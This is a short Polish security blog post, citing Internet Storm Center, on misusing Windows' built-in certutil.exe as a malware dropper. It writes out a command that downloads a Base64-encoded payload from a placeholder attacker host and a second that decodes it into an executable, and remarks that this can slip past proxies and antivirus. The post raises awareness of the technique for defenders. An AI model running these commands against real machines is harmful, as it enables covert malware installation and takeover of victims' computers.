Poprzedni Następny

Każdy Windows ma wbudowany dropper. Wystarczy go użyć

Dropper i Windows – schemat ataku

Jeden z podstawowych schematów ataku zakłada, że ofiara ściągnie i uruchomi dropper (oprogramowanie umożliwiające instalowanie dodatkowego oprogramowania bez ingerencji ze strony użytkownika). Ten z kolei pobierze właściwy złośliwy kod. Okazuje się, że w standardowych instalacjach Windows znajduje się już wbudowane narzędzie certutil.exe, które skutecznie i bez zbędnych śladów może zostać wykorzystane jako dropper. Przewidzianą funkcjonalnością certutil.exe jest wyświetlanie, zarzadzanie certyfikatami i kluczami. Ten pozornie prosty programik posiada jednak bardzo rozwiniętą funkcjonalność parametrów z linii komend. Między innymi przyjmuje jako parametry adresy URL.

Dropper z Windows w praktyce

Wyobraźmy sobie następujący atak:

C:\Temp>certutil.exe -urlcache -split -f “https://hackers.home/badcontent.txt” bad.txt

Powoduje ściągnięcie z internetu złośliwego plik zakodowanego do Base64 (co zazwyczaj pozwala ominąć zabezpieczenia proxy i antywirusa)

C:\Temp>certutil.exe -decode bad.txt bad.exe

Rozpakowujemy plik do formy wykonywanej.

W efekcie pozostaje tylko wykonać złośliwy kod na komputerze ofiary i przejąć nad nim pełną kontrole.

 

Źródło: Internet Storm Center

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Podobne